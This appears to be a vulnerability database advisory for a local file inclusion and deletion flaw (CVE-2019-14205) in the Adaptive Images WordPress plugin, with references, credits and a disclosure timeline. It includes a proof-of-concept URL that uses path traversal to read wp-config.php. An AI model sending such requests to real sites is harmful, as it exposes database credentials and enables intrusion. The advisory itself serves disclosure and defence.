Adaptive Images for WordPress <= 0.6.66 – Local File Inclusion & Deletion | CVE 2019-14205

Description

The Adaptive Images for WordPress WordPress plugin was affected by a Local File Inclusion & Deletion security vulnerability.

This vulnerability has been seen exploited in the wild.

Proof of Concept

https://www.example.com/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php

Affects Plugins

adaptive-images

Fixed in 0.6.67

References

CVE

CVE-2019-14205

CVE

CVE-2019-14206

URL

https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown

URL

https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html

URL

https://plugins.trac.wordpress.org/changeset/2121762/adaptive-images

Miscellaneous

Original Researcher

Mark Gruffer

Submitter

Ryan Dewhurst

Submitter website

https://wpscan.io

Submitter twitter

ethicalhack3r

Verified

WPVDB ID

025a47f0-eddc-46dd-b994-e1e824dc5225

Timeline

Publicly Published

2019-07-19 (about 6 years ago)

Added

2019-07-22 (about 6 years ago)

Last Updated

2021-04-04 (about 4 years ago)

Other

Published

Title

Published

2014-08-01

Title

RokIntroScroller <= 1.8 - XSS,DoS,Disclosure,Upload Vulnerabilities

Published

2019-11-13

Title

Email Subscribers & Newsletters < 4.2.3 - Multiple Issues

Published

2016-07-03

Title

Real3D FlipBook <= 2.8 - Multiple Vulnerabilities

Published

2017-06-10

Title

Responsive Menu < 3.1.4 - XSS and CSRF

Published

2019-07-29

Title

Real Estate 7 < 2.9.1 - Stored XSS & IDOR